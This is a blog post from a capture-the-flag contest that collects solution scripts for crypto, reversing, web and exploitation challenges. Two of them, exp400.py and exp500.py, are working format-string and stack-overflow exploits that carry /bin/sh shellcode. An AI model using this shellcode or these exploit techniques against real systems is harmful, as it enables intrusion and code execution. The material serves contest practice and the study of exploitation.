CSCAMP CTF - Collection of the Exploits

Monday, November 12, 2012 » cscamp, ctf, spq

CSCAMP CTF Exploits collection

Description

Because I'm lazy, I just put all the exploits here; the filenames should describe what each exploit is for...

cry300.py

#!/usr/bin/env python2.7

# 256-entry lookup table consumed by _crc16() via crc16xmodem(): one 16-bit
# value per possible index byte. Entry 1 is 0x1021, the CCITT polynomial used
# by the XModem CRC variant that the name refers to.
CRC16_XMODEM_TABLE = [
        0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,
        0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,
        0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,
        0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,
        0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,
        0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,
        0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,
        0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,
        0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,
        0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,
        0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,
        0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,
        0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,
        0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,
        0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,
        0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,
        0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,
        0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,
        0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,
        0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,
        0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,
        0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
        0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,
        0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,
        0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,
        0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,
        0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,
        0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,
        0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,
        0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,
        0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,
        0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0,
        ]


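def _crc16(data, crc, table):
    """Calculate CRC16 using the given table.
    `data`      - data for calculating CRC: a string, or a bytes/bytearray
                  object whose items are already integers
    `crc`       - initial value
    `table`     - table for calculating CRC (list of 256 integers)
    Return calculated value of CRC, masked to 16 bits
    """
    for byte in data:
        # Iterating a bytearray (or bytes on Python 3) yields ints, which
        # ord() rejects with TypeError; one-character strings still need ord().
        value = byte if isinstance(byte, int) else ord(byte)
        # Shift the register left by one byte and fold in the table entry
        # selected by (high byte of crc) XOR (input byte).
        crc = ((crc << 8) & 0xff00) ^ table[((crc >> 8) & 0xff) ^ value]
    return crc & 0xffff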


def crc16xmodem(data, crc=0):
    """Return the CRC-CCITT (XModem) flavour of CRC16 for `data`.
    `data`      - data to checksum, must be a string
    `crc`       - starting value of the CRC register (0 unless continuing)
    The work is delegated to _crc16() with CRC16_XMODEM_TABLE.
    """
    checksum = _crc16(data, crc, CRC16_XMODEM_TABLE)
    return checksum

# Candidate 11-character keys. Four positions are ambiguous (first char in
# m/S/T, fourth in q/I, sixth in m/S/T, last in y/Q); the other seven are
# fixed, which gives 3 * 2 * 3 * 2 = 36 strings in the same order as before.
possibilites = [
    first + 'h1' + fourth + 's' + sixth + 'h3Ke' + last
    for first in 'mST'
    for fourth in 'qI'
    for sixth in 'mST'
    for last in 'yQ'
]

# Print the CRC16/XModem value next to every candidate so the right one can
# be picked out by its checksum.
for p in possibilites:
    checksum = crc16xmodem(p)
    print hex(checksum), p

# Stop here: everything after this point is the earlier search stage and is
# no longer executed.
import sys
sys.exit(0)

import subprocess

# Characters tried at each key position: lowercase, uppercase, digits.
alphabet = (
    "abcdefghijklmnopqrstuvwxyz"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "0123456789"
)

# Values the output of ./crypt has to match, one per key character.
target = [
    0x7f, 0xe7, 0xff, 0xce, 0x00, 0x98,
    0x15, 0xdd, 0x88, 0xfb, 0x6e,
]

def get_possible_chars(pre):
    """Return the alphabet characters that extend `pre` consistently with target.

    For each character c in `alphabet`, ./crypt is run with `pre + c` as its
    only argument. Its output, from offset 24 up to the last two characters,
    is split on single spaces and parsed as hex numbers. c is kept when the
    first len(pre)+1 numbers equal the first len(pre)+1 entries of `target`.
    The result is a string of all kept characters, in alphabet order.
    """
    width = len(pre) + 1
    wanted = target[0:width]
    matches = []
    for candidate in alphabet:
        # Argument list form: the candidate is passed as one argv entry and
        # never goes through a shell.
        raw = subprocess.check_output(['./crypt', pre + candidate])
        values = [int(token, 16) for token in raw[24:-2].split(' ')]
        if values[0:width] == wanted:
            matches.append(candidate)
    return "".join(matches)

# Grow the candidate prefixes one character per round: every surviving prefix
# is extended by each character get_possible_chars() accepts for it.
possibilities = [""]
for i in xrange(0, len(target)):
    # Progress output: round number and the prefixes still alive.
    print i
    print possibilities
    possibilities = [
        p + c
        for p in possibilities
        for c in get_possible_chars(p)
    ]
print possibilities

cry400.py

#!/usr/bin/env python

def to_num(a,b,c):
    """Combine three binary-digit strings into one integer.

    `a` is taken as is, `b` is shifted left by 2 bits and `c` by 4 bits; the
    three parts are OR-ed together.
    """
    low = int(a, 2)
    mid = int(b, 2) << 2
    high = int(c, 2) << 4
    return low | mid | high

# Three parallel bit strings; each group of two bits at the same offset in
# t1/t2/t3 encodes one letter of the code table.
t1="1010111110111110010110101111101111100101101001111110"
t2="0010000101101111101100100001011011111011001011000101"
t3="0000000000000000000010101010101010101010111101111111"

# Lookup table: combined number -> letter. The letter is 'A' plus the index
# of the two-bit group (i >> 1), so later groups overwrite earlier ones that
# produce the same number.
t = {}
for i in xrange(0, len(t1), 2):
    key = to_num(t1[i:i+2], t2[i:i+2], t3[i:i+2])
    t[key] = chr(ord('A')+(i>>1))

def to_chr(a,b,c):
    """Look up the letter for one triple of two-bit strings in table `t`.

    Raises KeyError when the combined number is not in the table.
    """
    code = to_num(a, b, c)
    return t[code]

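# The message uses the same layout as the table: three parallel bit strings,
# read two bits at a time.
msg1="011001011001111010101010011111111110111101101110111010"
msg2="110010110010000010101010100101010011011011011100000101"
msg3="001110100010100010100010001000110010111010100000100011"
print "".join([to_chr(msg1[i:i+2], msg2[i:i+2], msg3[i:i+2]) for i in xrange(0, len(msg1), 2)])

# A trailing `print nums` was dropped here: `nums` is never assigned anywhere
# in this script, so that line raised NameError after the message was printed.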

exp400.py

#!/usr/bin/env python
import sys
import struct

def call(gdb = True):
    """Replace this process with the target binary, optionally under gdb.

    The argument vector is built from module-level values: the binary path,
    `shellcode`, 43 empty strings, `fstr`, then every entry of `addresses`.
    It is printed (entries joined by '" "') before the exec. The environment
    passed to execve is empty in both branches. On success this never returns.
    """
    import os
    binary = "/levels/level300/level300"
    #binary = "./level300_non_nx________"
    args = [binary, shellcode]
    args += [''] * 43
    args += [fstr]
    args += addresses
    print '" "'.join(args)
    if not gdb:
        os.execve(binary, args, {})
    else:
        # Same argv, but handed to gdb after "--args" for debugging.
        debugger = "/usr/bin/gdb"
        os.execve(debugger, [debugger, "--args"] + args, {})
# First value is only a size template: 1024 filler bytes plus a short byte
# string. Nothing but its length is used, because it is replaced two lines down.
shellcode = ("\x90" * 1024) + "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"
shellcode_len = len(shellcode)
# The byte string that is actually passed to the target as argv[1] by call().
shellcode = "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"
# Left-pad with 0x90 bytes so the final value is as long as the template was.
shellcode = ("\x90" * (shellcode_len - len(shellcode))) + shellcode

# Hard-coded stack address from one particular run of the target.
# NOTE(review): everything derived from it only holds while the target's stack
# lands at the same place, i.e. presumably with ASLR off — confirm.
rsp = 0x7fffffffe2b0 + (8 * 4)
#rsp = 0x7fffffffa000 + (8 * int(sys.argv[1]))

# rsp plus the fixed distance between two observed addresses.
shellcode_addr = rsp + (0x7fffffffe94c - 0x7fffffffe2b0)
# Address the eight writes below are aimed at (one byte offset each).
# NOTE(review): the name suggests a saved return pointer; not verifiable here.
retptr_addr = rsp + 8
# Positional-argument index used by the first %N$n directive.
# NOTE(review): the derivation of this sum is not shown in the listing.
addr_offset = 128 + 128 + 128 + 24 + 8 - 3

payload = ""
# Running count of characters the format string will have output, modulo 256.
written = 0

# Eight near-identical stanzas, one per byte of shellcode_addr, least
# significant byte first. Each stanza computes how many more characters must be
# output so that `written` equals the next address byte, appends "%<count>c"
# followed by "%<index>$n" for positional argument addr_offset + k, and then
# updates `written`.
# These directives only have an effect when the target uses argv data as a
# printf-style format string. Building the target with -Wformat
# -Wformat-security flags that pattern, and _FORTIFY_SOURCE=2 makes glibc
# abort on %n in a writable format string.
write_now = (0x100 + ((shellcode_addr >>  0) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 0) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >>  8) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 1) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >> 16) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 2) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >> 24) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 3) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >> 32) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 4) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >> 40) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 5) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >> 48) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 6) + "$n"
written = (written + write_now) & 0xff

write_now = (0x100 + ((shellcode_addr >> 56) & 0xff) - written) & 0xff
payload += "%" + str(write_now) + "c%" + str(addr_offset + 7) + "$n"
written = (written + write_now) & 0xff

# Drop padding directives whose count came out as 0, so a stanza that needs no
# extra characters emits none.
payload = payload.replace("%0c", "")

#payload = ""
#for i in xrange(addr_offset, addr_offset + 8):
#   payload+="%"+str(i)+"$s "

# Pad the format string with 'x' up to a fixed length of 1024 characters.
payload += "x" * (1024 - len(payload))
# Eight consecutive byte addresses packed as little-endian 64-bit values, five
# spaces appended, then split on NUL bytes into a list of strings that call()
# appends to argv (presumably because an argv entry cannot contain a NUL).
addresses = (struct.pack("<QQQQQQQQ", retptr_addr, retptr_addr + 1, retptr_addr + 2, retptr_addr + 3, retptr_addr + 4, retptr_addr + 5, retptr_addr + 6, retptr_addr + 7)+'     ').split("\x00")
fstr = payload
# Run the target directly rather than under gdb.
call(False)

exp500.py

#!/usr/bin/env python
import struct

# Hard-coded stack address (an observed base plus 128) that ends up as the last
# eight bytes of the buffer.
# NOTE(review): only meaningful while the target's stack address is the same on
# every run, i.e. presumably with ASLR off — confirm.
buffer_addr = 0x7fffffffe450+128
buffer = ""

# Overwritten by the very next assignment, so this two-byte value is never used.
shellcode = "\xeb\xfe"
shellcode = "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"

# pad buffer: 0x90 filler sized so that filler + shellcode is exactly 256 bytes
buffer += '\x90' * (256 - len(shellcode))

# add shellcode
buffer += shellcode

# unimportant vars: 152 bytes ('A' * 8 * 19) of filler between the 256-byte
# region and the final address
buffer += 'A' * (8 * 19)

# ret pointer: "Q" with no prefix packs in native byte order, unlike the
# explicit "<Q" used in exp400.py; the bytes are the same on a little-endian host
buffer += struct.pack("Q", buffer_addr)

# Hex-encode the whole buffer so the raw bytes can travel inside SQL text.
buffer_hex = ""
for c in buffer:
    buffer_hex += "%02x" % ord(c)
# Emits an UPDATE with no WHERE clause, so `question` is rewritten in every row
# of `questions`; unhex() turns the hex text back into raw bytes on the
# database side. How the target later reads this column is not shown here.
# NOTE(review): the layout (filler, code, padding, 8-byte address) implies the
# reader copies the field into a fixed-size stack buffer without a length
# check — presumably; a copy bounded by the buffer size removes the issue.
print 'UPDATE questions SET question = unhex(\'' + buffer_hex + '\')'

rev300a.py

#!/usr/bin/env python
def swap(a,b):
    """Exchange the items at indexes `a` and `b` of the module-level sequence `s`, in place."""
    s[a], s[b] = s[b], s[a]

# Two index permutations, one per scrambled string (18 and 9 entries).
lst1=[8,6,7,16,3,11,4,10,14,1,12,17,2,9,13,15,0,5]
#lst1=[15,13,11,0,10,2,9,6,16,14,12,7,8,3,4,5,1,17]
lst2=[6,8,0,3,7,1,5,4,2]
#lst2=[7,5,3,4,8,6,2,1,0]

# Inverse lookups: value -> position that value occupies in the list.
map1 = dict((value, index) for index, value in enumerate(lst1))
map2 = dict((value, index) for index, value in enumerate(lst2))
str1 = "AeLSQOpsSyjqnjZUss"
str2 = "eErEmEsrv"

# Undo the permutation: output position i takes the character that the list
# sent to i.
out1 = "".join(str1[map1[i]] for i in xrange(len(str1)))
out2 = "".join(str2[map2[i]] for i in xrange(len(str2)))
print out1, out2

# Two passes of pairwise swaps over `s`, first with offsets and indexes 8..0,
# then 4..0, printing `s` after each pass.
# NOTE(review): `s` is not assigned anywhere in this listing, so swap() raises
# NameError as written; the intended starting value is not shown.
for span in (8, 4):
    for x in xrange(span, -1, -1):
        for y in xrange(span, -1, -1):
            swap(y, y + x)
    print "".join(s)

rev300b.py

#!/usr/bin/env python
# List of 16-bit identifiers. Nothing else in this listing reads it.
# NOTE(review): the values look like Windows locale identifiers (LCIDs), and
# 0x0c1a, the value assigned to `l` further down, is one of them — presumably
# this was the candidate set for `l`; confirm.
locales=[0x0436,0x041c,0x0484,0x045e,0x0401,0x1401,0x3c01,0x0c01,0x0801,0x2c01,0x3401,0x3001,0x1001,0x1801,0x2001,0x4001,0x2801,0x1c01,0x3801,0x2401,0x042b,0x044d,0x082c,0x042c,0x046d,0x042d,0x0423,0x0445,0x0845,0x141A,0x047e,0x0402,0x0455,0x0403,0x045c,0x0804,0x1004,0x0404,0x0c04,0x1404,0x0483,0x041a,0x101a,0x0405,0x0406,0x048c,0x0465,0x0413,0x0813,0x0466,0x0409,0x0809,0x0c09,0x2809,0x1009,0x2409,0x3c09,0x4009,0x3809,0x1809,0x2009,0x4409,0x1409,0x3409,0x4809,0x1c09,0x2c09,0x3009,0x0425,0x0438,0x0429,0x0464,0x040b,0x040c,0x080c,0x2c0c,0x0c0c,0x240c,0x300c,0x3c0c,0x140c,0x340c,0x180c,0x380c,0xe40c,0x200c,0x280c,0x100c,0x1c0c,0x0462,0x0467,0x042f,0x0456,0x0437,0x0407,0x0c07,0x1407,0x1007,0x0807,0x0408,0x046f,0x0474,0x0447,0x0468,0x0475,0x040d,0x0439,0x040e,0x0469,0x040f,0x0470,0x0421,0x045d,0x083c,0x0410,0x0810,0x0411,0x0486,0x044b,0x0471,0x0860,0x0460,0x043f,0x0453,0x0487,0x0457,0x0412,0x0440,0x0454,0x0476,0x0426,0x0427,0x046e,0x043e,0x083e,0x044c,0x043a,0x0458,0x0481,0x0471,0x044e,0x047c,0x0450,0x0850,0x0461,0x0861,0x0414,0x0814,0x0482,0x0448,0x0472,0x0479,0x0463,0x0415,0x0416,0x0816,0x0446,0x0846,0x046B,0x086B,0x0C6B,0x0417,0x0418,0x0818,0x0419,0x0819,0x043b,0x044f,0x043c,0x046c,0x0c1a,0x081a,0x0459,0x0859,0x045b,0x041b,0x0424,0x0477,0x042e,0x0c0a,0x040a,0x2c0a,0x400a,0x340a,0x240a,0x140a,0x1c0a,0x300a,0x440a,0x100a,0x480a,0x580a,0x080a,0x4c0a,0x180a,0x3c0a,0x280a,0x500a,0x540a,0x380a,0x200a,0x0430,0x0441,0x041d,0x081d,0x045a,0x0428,0x045f,0x085f,0x0449,0x0444,0x044a,0x041e,0x0851,0x0451,0x0873,0x0473,0x0431,0x0432,0x041f,0x0442,0x0480,0x0422,0x0420,0x0820,0x0843,0x0443,0x0433,0x042a,0x0452,0x0488,0x0434,0x0485,0x0478,0x043d,0x046a,0x0435,0x04ff]
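# Fixed table of pseudo-random numbers replayed by rand(); every value fits in
# 15 bits (0..0x7fff), the range swap_random() divides by.
# NOTE(review): the opening values (41, 18467, 6334, ...) look like the MSVC
# rand() sequence for the default seed — presumably captured from the target's
# runtime; confirm.
# The page's line wrapping had split one entry across two lines
# ("...,4084,1" / "0075,18786,..."), which is a syntax error; the entry is
# rejoined as 10075 below.
random = [41,18467,6334,26500,19169,15724,11478,29358,26962,24464,5705,28145,23281,16827,9961,491,2995,11942,4827,5436,32391,14604,3902,153,292,12382,17421,18716,19718,19895,5447,21726,14771,11538,1869,19912,25667,26299,17035,9894,28703,23811,31322,30333,17673,4664,15141,7711,28253,6868,25547,27644,32662,32757,20037,12859,8723,9741,27529,778,12316,3035,22190,1842,288,30106,9040,8942,19264,22648,27446,23805,15890,6729,24370,15350,15006,31101,24393,3548,19629,12623,24084,19954,18756,11840,4966,7376,13931,26308,16944,32439,24626,11323,5537,21538,16118,2082,22929,16541,4833,31115,4639,29658,22704,9930,13977,2306,31673,22386,5021,28745,26924,19072,6270,5829,26777,15573,5097,16512,23986,13290,9161,18636,22355,24767,23655,15574,4031,12052,27350,1150,16941,21724,13966,3430,31107,30191,18007,11337,15457,12287,27753,10383,14945,8909,32209,9758,24221,18588,6422,24946,27506,13030,16413,29168,900,32591,18762,1655,17410,6359,27624,20537,21548,6483,27595,4041,3602,24350,10291,30836,9374,11020,4596,24021,27348,23199,19668,24484,8281,4734,53,1999,26418,27938,6900,3788,18127,467,3728,14893,24648,22483,17807,2421,14310,6617,22813,9514,14309,7616,18935,17451,20600,5249,16519,31556,22798,30303,6224,11008,5844,32609,14989,32702,3195,20485,3093,14343,30523,1587,29314,9503,7448,25200,13458,6618,20580,19796,14798,15281,19589,20798,28009,27157,20472,23622,18538,12292,6038,24179,18190,29657,7958,6191,19815,22888,19156,11511,16202,2634,24272,20055,20328,22646,26362,4886,18875,28433,29869,20142,23844,1416,21881,31998,10322,18651,10021,5699,3557,28476,27892,24389,5075,10712,2600,2510,21003,26869,17861,14688,13401,9789,15255,16423,5002,10585,24182,10285,27088,31426,28617,23757,9832,30932,4169,2154,25721,17189,19976,31329,2368,28692,21425,10555,3434,16549,7441,9512,30145,18060,21718,3753,16139,12423,16279,25996,16687,12529,22549,17437,19866,12949,193,23195,3297,20416,28286,16105,24488,16282,12455,25734,18114,11701,31316,20671,5786,12263,4313,24355,31185,20053,912,10808,1832,20945,4313,27756,28321,
19558,23646,27982,481,4144,23196,20222,7129,2161,5535,20450,11173,10466,12044,21659,26292,26439,17253,20024,26154,29510,4745,20649,13186,8313,4474,28022,2168,14018,18787,9905,17958,7391,10202,3625,26477,4414,9314,25824,29334,25874,24372,20159,11833,28070,7487,28297,7518,8177,17773,32270,1763,2668,17192,13985,3102,8480,29213,7627,4802,4099,30527,2625,1543,1924,11023,29972,13061,14181,31003,27432,17505,27593,22725,13031,8492,142,17222,31286,13064,7900,19187,8360,22413,30974,14270,29170,235,30833,19711,25760,18896,4667,7285,12550,140,13694,2695,21624,28019,2125,26576,21694,22658,26302,17371,22466,4678,22593,23851,25484,1018,28464,21119,23152,2800,18087,31060,1926,9010,4757,32170,20315,9576,30227,12043,22758,7164,5109,7882,17086,29565,3487,29577,14474,2625,25627,5629,31928,25423,28520,6902,14962,123,24596,3737,13261,10195,32525,1264,8260,6202,8116,5030,20326,29011,30771,6411,25547,21153,21520,29790,14924,30188,21763,4940,20851,18662,13829,30900,17713,18958,17578,8365,13007,11477,1200,26058,6439,2303,12760,19357,2324,6477,5108,21113,14887,19801,22850,14460,22428,12993,27384,19405,6540,31111,28704,12835,32356,6072,29350,18823,14485,20556,23216,1626,9357,8526,13357,29337,23271,23869,29361,12896,13022,29617,10112,12717,18696,11585,24041,24423,24129,24229,4565,6559,8932,22296,29855,12053,16962,3584,29734,6654,16972,21457,14369,22532,2963,2607,2483,911,11635,10067,22848,4675,12938,2223,22142,23754,6511,22741,20175,21459,17825,3221,17870,1626,31934,15205,31783,23850,17398,22279,22701,12193,12734,1637,26534,5556,1993,10176,25705,6962,10548,15881,300,14413,16641,19855,24855,13142,11462,27611,30877,20424,32678,1752,18443,28296,12673,10040,9313,875,20072,12818,610,1017,14932,28112,30695,13169,23831,20040,26488,28685,19090,19497,2589,25990,15145,19353,19314,18651,26740,22044,11258,335,8759,11192,7605,25264,12181,28503,3829,23775,20608,29292,5997,17549,29556,25561,31627,6467,29541,26129,31240,27813,29174,20601,6077,20215,8683,8213,23992,25824,5601,23392,15759,2670,26428,28027,4084,
10075,18786,15498,24970,6287,23847,32604,503,21221,22663,5706,2363,9010,22171,27489,18240,12164,25542,7619,20913,7591,6704,31818,9232,750,25205,4975,1539,303,11422,21098,11247,13584,13648,2971,17864,22913,11075,21545,28712,17546,18678,1769,15262,8519,13985,28289,15944,2865,18540,23245,25508,28318,27870,9601,28323,21132,24472,27152,25087,28570,29763,29901,17103,14423,3527,11600,26969,14015,5565,28,21543,25347,2088,2943,12637,22409,26463,5049,4681,1588,11342,608,32060,21221,1758,29954,20888,14146,690,7949,12843,21430,25620,748,27067,4536,20783,18035,32226,15185,7038,9853,25629,11224,15748,19923,3359,32257,24766,4944,14955,23318,32726,25411,21025,20355,31001,22549,9496,18584,9515,17964,23342,8075,17913,16142,31196,21948,25072,20426,14606,26173,24429,32404,6705,20626,29812,19375,30093,16565,16036,14736,29141,30814,5994,8256,6652,23936,30838,20482,1355,21015,1131,18230,17841,14625,2011,32637,4186,19690,1650,5662,21634,10893,10353,21416,13452,14008,7262,22233,5454,16303,16634,26303,14256,148,11124,12317,4213,27109,24028,29200,21080,21318,16858,24050,24155,31361,15264,11903,3676,29643,26909,14902,3561,28489,24948,1282,13653,30674,2220,5402,6923,3831,19369,3878,20259,19008,22619,23971,30003,21945,9781,26504,12392,32685,25313,6698,5589,12722,5938,19037,6410,31461,6234,12508,9961,3959,6493,1515,25269,24937,28869,58,14700,13971,26264,15117,16215,24555,7815,18330,3039,30212,29288,28082,1954,16085,20710,24484,24774,8380,29815,25951,6541,18115,1679,17110,25898,23073,788,23977,18132,29956,28689,26113,10008,12941,15790,1723,21363,28,25184,24778,7200,5071,1885,21974,1071,11333,22867,26153,14295,32168,20825,9676,15629,28650,2598,3309,4693,4686,30080,10116,12249,26667,1528,26679,7864,29421,8405,8826,6816,7516,27726,28666,29087,27681,19964,1340,5686,6021,11662,14721,6064,29309,20415,17902,29873]
# Index of the next table entry rand() will hand out.
rand_pos = 0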

def rand_reset():
    """Rewind the replay position so the next rand() returns random[0] again."""
    global rand_pos
    rand_pos = 0

def rand():
    """Return the next value from the fixed `random` table and advance the position.

    Raises IndexError once the table is exhausted; the position is not
    advanced in that case.
    """
    global rand_pos
    index = rand_pos
    value = random[index]
    rand_pos = index + 1
    return value


# Index permutation applied to the 18-character target string.
rotations = [8,6,7,16,3,11,4,10,14,1,12,17,2,9,13,15,0,5]
# Inverse lookup: value -> position that value occupies in `rotations`.
rot_map = dict((value, index) for index, value in enumerate(rotations))
target = "AeLSQOpsSyjqnjZUss"
target_orig = target
# Undo the permutation: output position i takes target[rot_map[i]].
rotated = "".join(target[rot_map[i]] for i in xrange(len(target)))
# Not read anywhere else in this listing.
broken = [1,3,4,9,11,12,13,15]
print rotated
def swap(data, a, b):
    """Return a copy of string `data` with the characters at `a` and `b` exchanged.

    `data` is returned unchanged when both indexes are equal.
    """
    if a == b:
        return data
    lo, hi = (a, b) if a < b else (b, a)
    # Three untouched stretches: before lo, between lo and hi, after hi.
    head = data[0:lo]
    middle = data[lo+1:hi]
    tail = data[hi+1:]
    return head + data[hi] + middle + data[lo] + tail

def set_str(str, pos, new_char):
    """Return a copy of `str` in which the character at `pos` is replaced by `new_char`."""
    before = str[0:pos]
    after = str[pos+1:]
    return "".join((before, new_char, after))

def swap_random(data):
    """Shuffle `data` by swapping each position with one at or after it.

    For position i, the next rand() value is scaled down to an offset below
    the number of characters left (len(data) - i), and the characters at i
    and i + offset are exchanged. Consumes len(data) values from rand().
    """
    size = len(data)
    pos = 0
    while pos < size:
        # Python 2 integer division on both lines: 0x7fff is split into
        # (size - pos) buckets, and the rand() value picks one.
        bucket = 0x7fff / (size - pos) + 1
        offset = rand() / bucket
        data = swap(data, pos, pos + offset)
        pos += 1
    return data

def swap_weird1(data, x, y, l):
    """Run x+1 mixing steps over `data`, pairing position p with position p+y.

    At each step the character at p+y is copied to p, and p+y receives the
    old character at p XOR-ed with ((l >> low five bits of that character)
    & 0xa0). Returns the resulting string.
    """
    for p in xrange(x + 1):
        tmp = ord(data[p])
        data = set_str(data, p, data[p+y])
        # & binds tighter than ^, so the mask applies to the shifted l only.
        mixed = ((l >> (tmp & 0x1f)) & 0xa0) ^ tmp
        data = set_str(data, p+y, chr(mixed))
    return data

def swap_weird2(data, x, y, l):
    """Run x+1 mixing steps over `data`, pairing position p with position p+y.

    Same shape as swap_weird1, but `l` is shifted left instead of right and
    the mask is 0xb8: p+y receives the old character at p XOR-ed with
    ((l << low five bits of that character) & 0xb8).
    """
    for p in xrange(x + 1):
        tmp = ord(data[p])
        data = set_str(data, p, data[p+y])
        # & binds tighter than ^, so the mask applies to the shifted l only.
        mixed = ((l << (tmp & 0x1f)) & 0xb8) ^ tmp
        data = set_str(data, p+y, chr(mixed))
    return data

# Starting guess for the 18-character input and the 16-bit value fed to the
# mixing steps.
input = "synapseLABsOjZSUSq"
l = 0x0c1a
valid_results = [""]
short = []
# Output the forward transform has to reproduce: both strings concatenated.
expected = target_orig + "eErEmEsrv"

# For every position, try all 256 byte values there (the other positions keep
# the guess), replay the forward transform and keep the values that
# reproduce the expected output.
for p in xrange(0, len(input)):
    print "randomizing", p
    matching = []
    for code in xrange(256):
        # Each trial restarts the replayed random sequence; the order of the
        # four swap_random() calls below decides which values each one gets.
        rand_reset()
        first = swap_random(set_str(input, p, chr(code)))
        second = swap_random("reverseme")
        first = swap_random(first)
        second = swap_random(second)
        for shift in xrange(5):
            first = swap_weird1(first, 4, shift, l)
        for shift in xrange(5):
            second = swap_weird1(second, 4, shift, l)
        for shift in xrange(9):
            first = swap_weird2(first, 8, shift, l)
        if first + second == expected:
            matching.append(chr(code))
    chars = "".join(matching)
    short.append(chars)
    # Cross product of the prefixes found so far with this position's matches.
    valid_results = [prefix + ch for prefix in valid_results for ch in chars]
print len(valid_results), valid_results
print short

web100.py

#!/usr/bin/env python
import urllib2
import urllib
import base64
import re

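# Fetch the challenge page; the session cookie and the encoded equation both
# arrive in the response headers.
equation = urllib2.urlopen("http://176.9.193.13/ASmallCalculationChal411A784Y.php")
for l in equation.info().headers:
    # The listing's if/elif pair had mismatched indentation (a syntax error);
    # both branches now sit at the same level inside the loop.
    if l[0:11] == "Set-Cookie:":
        # Skip the "Set-Cookie: " prefix and the last 10 characters of the line.
        cookie = l[12:-10]
    elif l[0:2] == "EQ":
        # Base64 payload after a 4-character prefix, minus the 2-character line ending.
        eq = base64.b64decode(l[4:-2])

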